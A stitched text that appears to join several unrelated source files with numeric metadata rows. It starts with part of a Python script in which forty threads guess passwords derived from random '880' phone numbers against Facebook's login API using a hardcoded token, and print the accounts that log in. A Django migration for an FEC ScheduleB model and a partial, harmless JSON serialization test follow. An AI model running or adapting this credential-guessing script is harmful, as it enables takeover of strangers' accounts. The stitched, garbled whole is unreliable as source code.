g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi28():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi29():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi30():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi31():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi32():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi33():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi34():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi35():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi36():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi37():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi38():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi39():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi40():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
#############################
t1=pool(target=hi1)
t2=pool(target=hi2)
t3=pool(target=hi3)
t4=pool(target=hi4)
t5=pool(target=hi5)
t6=pool(target=hi6)
t7=pool(target=hi7)
t8=pool(target=hi8)
t9=pool(target=hi9)
t10=pool(target=hi10)
t11=pool(target=hi11)
t12=pool(target=hi12)
t13=pool(target=hi13)
t14=pool(target=hi14)
t15=pool(target=hi15)
t16=pool(target=hi16)
t17=pool(target=hi17)
t18=pool(target=hi18)
t19=pool(target=hi19)
t20=pool(target=hi20)
t21=pool(target=hi21)
t22=pool(target=hi22)
t23=pool(target=hi23)
t24=pool(target=hi24)
t25=pool(target=hi25)
t26=pool(target=hi26)
t27=pool(target=hi27)
t28=pool(target=hi28)
t29=pool(target=hi29)
t30=pool(target=hi30)
t31=pool(target=hi31)
t32=pool(target=hi32)
t33=pool(target=hi33)
t34=pool(target=hi34)
t35=pool(target=hi35)
t36=pool(target=hi36)
t37=pool(target=hi37)
t38=pool(target=hi38)
t39=pool(target=hi39)
t40=pool(target=hi40)
###############
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t6.start()
t7.start()
t8.start()
t9.start()
t10.start()
t11.start()
t12.start()
t13.start()
t14.start()
t15.start()
t16.start()
t17.start()
t18.start()
t19.start()
t20.start()
t21.start()
t22.start()
t23.start()
t24.start()
t25.start()
t26.start()
t27.start()
t28.start()
t29.start()
t30.start()
t31.start()
t32.start()
t33.start()
t34.start()
t35.start()
t36.start()
t37.start()
t38.start()
t39.start()
t40.start()
| 29.277481
| 282
| 0.658003
| 3,845
| 27,433
| 4.784655
| 0.075423
| 0.021743
| 0.013046
| 0.023917
| 0.842257
| 0.839756
| 0.839756
| 0.835952
| 0.835952
| 0.835952
| 0
| 0.174749
| 0.122006
| 27,433
| 936
| 283
| 29.308761
| 0.562028
| 0.032917
| 0
| 0.679115
| 0
| 0.056708
| 0.483467
| 0.177271
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056708
| false
| 0.055325
| 0.011065
| 0
| 0.067773
| 0.085754
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d182e2f1208922373b737d8cf754956ba62861fa
| 5,266
|
py
|
Python
|
cycle_2018/migrations/0007_scheduleb.py
|
RobBickel/nyt-fec
|
802df867c3b31fff8e922be00bab6f40a5db2d00
|
[
"Apache-2.0"
] | 17
|
2018-03-27T15:09:58.000Z
|
2020-05-13T11:32:43.000Z
|
cycle_2018/migrations/0007_scheduleb.py
|
RobBickel/nyt-fec
|
802df867c3b31fff8e922be00bab6f40a5db2d00
|
[
"Apache-2.0"
] | 59
|
2018-03-21T17:08:15.000Z
|
2021-12-13T19:47:37.000Z
|
cycle_2018/migrations/0007_scheduleb.py
|
RobBickel/nyt-fec
|
802df867c3b31fff8e922be00bab6f40a5db2d00
|
[
"Apache-2.0"
] | 11
|
2018-09-11T23:18:32.000Z
|
2021-12-15T08:43:58.000Z
|
# Generated by Django 2.0.1 on 2018-02-16 22:22
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('cycle_2018', '0006_auto_20180216_2106'),
]
operations = [
migrations.CreateModel(
name='ScheduleB',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('active', models.BooleanField(default=True)),
('created', models.DateTimeField(default=django.utils.timezone.now)),
('updated', models.DateTimeField(auto_now=True)),
('form_type', models.CharField(blank=True, max_length=255, null=True)),
('filer_committee_id_number', models.CharField(blank=True, max_length=255, null=True)),
('filing_id', models.IntegerField(blank=True, null=True)),
('transaction_id', models.CharField(blank=True, max_length=255, null=True)),
('back_reference_tran_id_number', models.CharField(blank=True, max_length=255, null=True)),
('back_reference_sched_name', models.CharField(blank=True, max_length=255, null=True)),
('entity_type', models.CharField(blank=True, max_length=255, null=True)),
('payee_organization_name', models.CharField(blank=True, max_length=255, null=True)),
('payee_last_name', models.CharField(blank=True, max_length=255, null=True)),
('payee_first_name', models.CharField(blank=True, max_length=255, null=True)),
('payee_middle_name', models.CharField(blank=True, max_length=255, null=True)),
('payee_prefix', models.CharField(blank=True, max_length=255, null=True)),
('payee_suffix', models.CharField(blank=True, max_length=255, null=True)),
('payee_street_1', models.CharField(blank=True, max_length=255, null=True)),
('payee_street_2', models.CharField(blank=True, max_length=255, null=True)),
('payee_city', models.CharField(blank=True, max_length=255, null=True)),
('payee_state', models.CharField(blank=True, max_length=30, null=True)),
('payee_zip', models.CharField(blank=True, max_length=10, null=True)),
('election_code', models.CharField(blank=True, max_length=255, null=True)),
('election_other_description', models.CharField(blank=True, max_length=255, null=True)),
('expenditure_date', models.CharField(blank=True, max_length=255, null=True)),
('expenditure_amount', models.DecimalField(blank=True, decimal_places=2, max_digits=12, null=True)),
('semi_annual_refunded_bundled_amt', models.DecimalField(blank=True, decimal_places=2, max_digits=12, null=True)),
('expenditure_purpose_descrip', models.CharField(blank=True, max_length=255, null=True)),
('category_code', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_committee_fec_id', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_committee_name', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_fec_id', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_last_name', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_first_name', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_middle_name', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_prefix', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_suffix', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_office', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_state', models.CharField(blank=True, max_length=255, null=True)),
('beneficiary_candidate_district', models.CharField(blank=True, max_length=255, null=True)),
('conduit_name', models.CharField(blank=True, max_length=255, null=True)),
('conduit_street_1', models.CharField(blank=True, max_length=255, null=True)),
('conduit_street_2', models.CharField(blank=True, max_length=255, null=True)),
('conduit_city', models.CharField(blank=True, max_length=255, null=True)),
('conduit_state', models.CharField(blank=True, max_length=255, null=True)),
('conduit_zip', models.CharField(blank=True, max_length=255, null=True)),
('memo_code', models.CharField(blank=True, max_length=255, null=True)),
('memo_text_description', models.CharField(blank=True, max_length=255, null=True)),
('reference_to_si_or_sl_system_code_that_identifies_the_account', models.CharField(blank=True, max_length=255, null=True)),
],
options={
'abstract': False,
},
),
]
| 73.138889
| 139
| 0.646031
| 619
| 5,266
| 5.261712
| 0.189015
| 0.124348
| 0.257906
| 0.309487
| 0.778324
| 0.778324
| 0.778324
| 0.754682
| 0.754682
| 0.727663
| 0
| 0.04089
| 0.215154
| 5,266
| 71
| 140
| 74.169014
| 0.747157
| 0.008545
| 0
| 0
| 1
| 0
| 0.188542
| 0.117072
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030769
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d18dc137b20e6e118cba0556bb79383907ed97e3
| 69,012
|
py
|
Python
|
projects/Python/tests/test_serialization_json.py
|
kokizzu/FastBinaryEncoding
|
eec54ef2fb83de0bb24cc33a591f9896d360f23c
|
[
"MIT"
] | 563
|
2018-09-04T23:52:42.000Z
|
2022-03-24T01:35:50.000Z
|
projects/Python/tests/test_serialization_json.py
|
kokizzu/FastBinaryEncoding
|
eec54ef2fb83de0bb24cc33a591f9896d360f23c
|
[
"MIT"
] | 44
|
2018-12-04T11:13:34.000Z
|
2022-03-01T00:22:05.000Z
|
projects/Python/tests/test_serialization_json.py
|
kokizzu/FastBinaryEncoding
|
eec54ef2fb83de0bb24cc33a591f9896d360f23c
|
[
"MIT"
] | 69
|
2018-11-06T12:15:39.000Z
|
2022-02-10T13:51:01.000Z
|
import datetime
import decimal
import uuid
import proto
from proto import proto
from proto import test
from unittest import TestCase
class TestSerializationJson(TestCase):
def test_serialization_json_domain(self):
# Define a source JSON string
json = r'{"id":1,"name":"Test","state":6,"wallet":{"currency":"USD","amount":1000.0},"asset":{"currency":"EUR","amount":100.0},"orders":[{"id":1,"symbol":"EURUSD","side":0,"type":0,"price":1.23456,"volume":1000.0},{"id":2,"symbol":"EURUSD","side":1,"type":1,"price":1.0,"volume":100.0},{"id":3,"symbol":"EURUSD","side":0,"type":2,"price":1.5,"volume":10.0}]}'
# Create a new account from the source JSON string
account1 = proto.Account.from_json(json)
# Serialize the account to the JSON string
json = account1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the account from the JSON string
account2 = proto.Account.from_json(json)
self.assertEqual(account2.id, 1)
self.assertEqual(account2.name, "Test")
self.assertTrue(account2.state.has_flags(proto.State.good))
self.assertEqual(account2.wallet.currency, "USD")
self.assertEqual(account2.wallet.amount, 1000.0)
self.assertNotEqual(account2.asset, None)
self.assertEqual(account2.asset.currency, "EUR")
self.assertEqual(account2.asset.amount, 100.0)
self.assertEqual(len(account2.orders), 3)
self.assertEqual(account2.orders[0].id, 1)
self.assertEqual(account2.orders[0].symbol, "EURUSD")
self.assertEqual(account2.orders[0].side, proto.OrderSide.buy)
self.assertEqual(account2.orders[0].type, proto.OrderType.market)
self.assertEqual(account2.orders[0].price, 1.23456)
self.assertEqual(account2.orders[0].volume, 1000.0)
self.assertEqual(account2.orders[1].id, 2)
self.assertEqual(account2.orders[1].symbol, "EURUSD")
self.assertEqual(account2.orders[1].side, proto.OrderSide.sell)
self.assertEqual(account2.orders[1].type, proto.OrderType.limit)
self.assertEqual(account2.orders[1].price, 1.0)
self.assertEqual(account2.orders[1].volume, 100.0)
self.assertEqual(account2.orders[2].id, 3)
self.assertEqual(account2.orders[2].symbol, "EURUSD")
self.assertEqual(account2.orders[2].side, proto.OrderSide.buy)
self.assertEqual(account2.orders[2].type, proto.OrderType.stop)
self.assertEqual(account2.orders[2].price, 1.5)
self.assertEqual(account2.orders[2].volume, 10.0)
def test_serialization_json_struct_simple(self):
# Define a source JSON string
json = r'{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145597933463000,"f36":"00000000-0000-0000-0000-000000000000","f37":"e7854072-f0a5-11e8-8f69-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}'
# Create a new struct from the source JSON string
struct1 = test.StructSimple.from_json(json)
# Serialize the struct to the JSON string
json = struct1.to_json()
# Check the serialized JSON size
self.assertGreater(len(json), 0)
# Deserialize the struct from the JSON string
struct2 = test.StructSimple.from_json(json)
self.assertEqual(struct2.f1, False)
self.assertEqual(struct2.f2, True)
self.assertEqual(struct2.f3, 0)
self.assertEqual(struct2.f4, 0xFF)
self.assertEqual(struct2.f5, '\0')
self.assertEqual(struct2.f6, '!')
self.assertEqual(struct2.f7, chr(0))
self.assertEqual(struct2.f8, chr(0x0444))
self.assertEqual(struct2.f9, 0)
self.assertEqual(struct2.f10, 127)
self.assertEqual(struct2.f11, 0)
self.assertEqual(struct2.f12, 0xFF)
self.assertEqual(struct2.f13, 0)
self.assertEqual(struct2.f14, 32767)
self.assertEqual(struct2.f15, 0)
self.assertEqual(struct2.f16, 0xFFFF)
self.assertEqual(struct2.f17, 0)
self.assertEqual(struct2.f18, 2147483647)
self.assertEqual(struct2.f19, 0)
self.assertEqual(struct2.f20, 0xFFFFFFFF)
self.assertEqual(struct2.f21, 0)
self.assertEqual(struct2.f22, 9223372036854775807)
self.assertEqual(struct2.f23, 0)
self.assertEqual(struct2.f24, 0xFFFFFFFFFFFFFFFF)
self.assertEqual(struct2.f25, 0.0)
self.assertLess(abs(struct2.f26 - 123.456), 0.0001)
self.assertEqual(struct2.f27, 0.0)
self.assertLess(abs(struct2.f28 - -123.567e+123), 1e+123)
self.assertEqual(struct2.f29, decimal.Decimal("0"))
self.assertEqual(struct2.f30, decimal.Decimal("123456.123456"))
self.assertEqual(struct2.f31, "")
self.assertEqual(struct2.f32, "Initial string!")
self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f33 / 1000000000), datetime.datetime(1970, 1, 1))
self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f34 / 1000000000), datetime.datetime(1970, 1, 1))
self.assertGreater(datetime.datetime.utcfromtimestamp(struct2.f35 / 1000000000), datetime.datetime(2018, 1, 1))
self.assertEqual(struct2.f36, uuid.UUID(int=0))
self.assertNotEqual(struct2.f37, uuid.UUID(int=0))
self.assertEqual(struct2.f38, uuid.UUID("123e4567-e89b-12d3-a456-426655440000"))
self.assertEqual(struct2.f1, struct1.f1)
self.assertEqual(struct2.f2, struct1.f2)
self.assertEqual(struct2.f3, struct1.f3)
self.assertEqual(struct2.f4, struct1.f4)
self.assertEqual(struct2.f5, struct1.f5)
self.assertEqual(struct2.f6, struct1.f6)
self.assertEqual(struct2.f7, struct1.f7)
self.assertEqual(struct2.f8, struct1.f8)
self.assertEqual(struct2.f9, struct1.f9)
self.assertEqual(struct2.f10, struct1.f10)
self.assertEqual(struct2.f11, struct1.f11)
self.assertEqual(struct2.f12, struct1.f12)
self.assertEqual(struct2.f13, struct1.f13)
self.assertEqual(struct2.f14, struct1.f14)
self.assertEqual(struct2.f15, struct1.f15)
self.assertEqual(struct2.f16, struct1.f16)
self.assertEqual(struct2.f17, struct1.f17)
self.assertEqual(struct2.f18, struct1.f18)
self.assertEqual(struct2.f19, struct1.f19)
self.assertEqual(struct2.f20, struct1.f20)
self.assertEqual(struct2.f21, struct1.f21)
self.assertEqual(struct2.f22, struct1.f22)
self.assertEqual(struct2.f23, struct1.f23)
self.assertEqual(struct2.f24, struct1.f24)
self.assertEqual(struct2.f25, struct1.f25)
self.assertLess(abs(struct2.f26 - struct1.f26), 0.0001)
self.assertEqual(struct2.f27, struct1.f27)
self.assertLess(abs(struct2.f28 - struct1.f28), 1e+123)
self.assertEqual(struct2.f29, struct1.f29)
self.assertEqual(struct2.f30, struct1.f30)
self.assertEqual(struct2.f31, struct1.f31)
self.assertEqual(struct2.f32, struct1.f32)
self.assertEqual(struct2.f33, struct1.f33)
self.assertEqual(struct2.f34, struct1.f34)
self.assertEqual(struct2.f35, struct1.f35)
self.assertEqual(struct2.f36, struct1.f36)
self.assertEqual(struct2.f37, struct1.f37)
self.assertEqual(struct2.f38, struct1.f38)
self.assertEqual(struct2.f39, struct1.f39)
self.assertEqual(struct2.f40, struct1.f40)
def test_serialization_json_struct_optional(self):
    """Verify the JSON round trip of StructOptional.

    Parses a reference JSON document, serializes the resulting struct back
    to JSON, parses that output again, then checks both the absolute field
    values and the field-by-field equality of the two struct instances.
    """
    # Define a source JSON string
    json = r'{"id":0,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543145860677797000,"f36":"00000000-0000-0000-0000-000000000000","f37":"8420d1c6-f0a6-11e8-80fc-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]},"f100":null,"f101":true,"f102":null,"f103":null,"f104":255,"f105":null,"f106":null,"f107":33,"f108":null,"f109":null,"f110":1092,"f111":null,"f112":null,"f113":127,"f114":null,"f115":null,"f116":255,"f117":null,"f118":null,"f119":32767,"f120":null,"f121":null,"f122":65535,"f123":null,"f124":null,"f125":2147483647,"f126":null,"f127":null,"f128":4294967295,"f129":null,"f130":null,"f131":9223372036854775807,"f132":null,"f133":null,"f134":18446744073709551615,"f135":null,"f136":null,"f137":123.456,"f138":null,"f139":null,"f140":-1.23456e+125,"f141":null,"f142":null,"f143":"123456.123456","f144":null,"f145":null,"f146":"Initial string!","f147":null,"f148":null,"f149":1543145860678429000,"f150":null,"f151":null,"f152":"123e4567-e89b-12d3-a456-426655440000","f153":null,"f154":null,"f155":null,"f156":null,"f157":null,"f158":null,"f159":null,"f160":null,"f161":null,"f162":null,"f163":null,"f164":null,"f165":null}'
    # Create a new struct from the source JSON string
    struct1 = test.StructOptional.from_json(json)
    # Serialize the struct to the JSON string
    json = struct1.to_json()
    # Check the serialized JSON size
    self.assertGreater(len(json), 0)
    # Deserialize the struct from the JSON string
    struct2 = test.StructOptional.from_json(json)
    # Required fields must survive the round trip with their source values
    self.assertEqual(struct2.f1, False)
    self.assertEqual(struct2.f2, True)
    self.assertEqual(struct2.f3, 0)
    self.assertEqual(struct2.f4, 0xFF)
    self.assertEqual(struct2.f5, '\0')
    self.assertEqual(struct2.f6, '!')
    self.assertEqual(struct2.f7, chr(0))
    self.assertEqual(struct2.f8, chr(0x0444))
    self.assertEqual(struct2.f9, 0)
    self.assertEqual(struct2.f10, 127)
    self.assertEqual(struct2.f11, 0)
    self.assertEqual(struct2.f12, 0xFF)
    self.assertEqual(struct2.f13, 0)
    self.assertEqual(struct2.f14, 32767)
    self.assertEqual(struct2.f15, 0)
    self.assertEqual(struct2.f16, 0xFFFF)
    self.assertEqual(struct2.f17, 0)
    self.assertEqual(struct2.f18, 2147483647)
    self.assertEqual(struct2.f19, 0)
    self.assertEqual(struct2.f20, 0xFFFFFFFF)
    self.assertEqual(struct2.f21, 0)
    self.assertEqual(struct2.f22, 9223372036854775807)
    self.assertEqual(struct2.f23, 0)
    self.assertEqual(struct2.f24, 0xFFFFFFFFFFFFFFFF)
    self.assertEqual(struct2.f25, 0.0)
    # Floating point fields are compared with a tolerance
    self.assertLess(abs(struct2.f26 - 123.456), 0.0001)
    self.assertEqual(struct2.f27, 0.0)
    self.assertLess(abs(struct2.f28 - -123.567e+123), 1e+123)
    self.assertEqual(struct2.f29, decimal.Decimal("0"))
    self.assertEqual(struct2.f30, decimal.Decimal("123456.123456"))
    self.assertEqual(struct2.f31, "")
    self.assertEqual(struct2.f32, "Initial string!")
    # Timestamps are stored as nanoseconds since the Unix epoch
    self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f33 / 1000000000), datetime.datetime(1970, 1, 1))
    self.assertEqual(datetime.datetime.utcfromtimestamp(struct2.f34 / 1000000000), datetime.datetime(1970, 1, 1))
    self.assertGreater(datetime.datetime.utcfromtimestamp(struct2.f35 / 1000000000), datetime.datetime(2018, 1, 1))
    self.assertEqual(struct2.f36, uuid.UUID(int=0))
    self.assertNotEqual(struct2.f37, uuid.UUID(int=0))
    self.assertEqual(struct2.f38, uuid.UUID("123e4567-e89b-12d3-a456-426655440000"))
    # Optional fields that were null in the source must stay None
    for index in (100, 102, 103, 105, 106, 108, 109, 111, 112, 114, 115,
                  117, 118, 120, 121, 123, 124, 126, 127, 129, 130, 132,
                  133, 135, 136, 138, 139, 141, 142, 144, 145, 147, 148,
                  150, 151, 153, 154, 155, 156, 157, 158, 159, 160, 161,
                  162, 163, 164, 165):
        self.assertIsNone(getattr(struct2, "f%d" % index), "f%d" % index)
    # Optional fields that carried a value must keep it
    self.assertEqual(struct2.f101, True)
    self.assertEqual(struct2.f104, 0xFF)
    self.assertEqual(struct2.f107, '!')
    self.assertEqual(struct2.f110, chr(0x0444))
    self.assertEqual(struct2.f113, 127)
    self.assertEqual(struct2.f116, 0xFF)
    self.assertEqual(struct2.f119, 32767)
    self.assertEqual(struct2.f122, 0xFFFF)
    self.assertEqual(struct2.f125, 2147483647)
    self.assertEqual(struct2.f128, 0xFFFFFFFF)
    self.assertEqual(struct2.f131, 9223372036854775807)
    # BUG FIX: the original re-checked f131 here instead of verifying f134
    self.assertIsNotNone(struct2.f134)
    self.assertEqual(struct2.f134, 0xFFFFFFFFFFFFFFFF)
    self.assertIsNotNone(struct2.f137)
    self.assertLess(abs(struct2.f137 - 123.456), 0.0001)
    self.assertIsNotNone(struct2.f140)
    self.assertLess(abs(struct2.f140 - -123.567e+123), 1e+123)
    self.assertEqual(struct2.f143, decimal.Decimal("123456.123456"))
    self.assertEqual(struct2.f146, "Initial string!")
    self.assertIsNotNone(struct2.f149)
    self.assertGreater(datetime.datetime.utcfromtimestamp(struct2.f149 / 1000000000), datetime.datetime(2018, 1, 1))
    self.assertEqual(struct2.f152, uuid.UUID("123e4567-e89b-12d3-a456-426655440000"))
    # Both struct instances must be field-by-field equal after the round trip
    # (f26/f28 and f137/f140 are floats and are compared with a tolerance)
    for index in list(range(1, 26)) + [27] + list(range(29, 38)):
        name = "f%d" % index
        self.assertEqual(getattr(struct2, name), getattr(struct1, name), name)
    self.assertLess(abs(struct2.f26 - struct1.f26), 0.0001)
    self.assertLess(abs(struct2.f28 - struct1.f28), 1e+123)
    for index in list(range(100, 137)) + [138, 139] + list(range(141, 158)):
        name = "f%d" % index
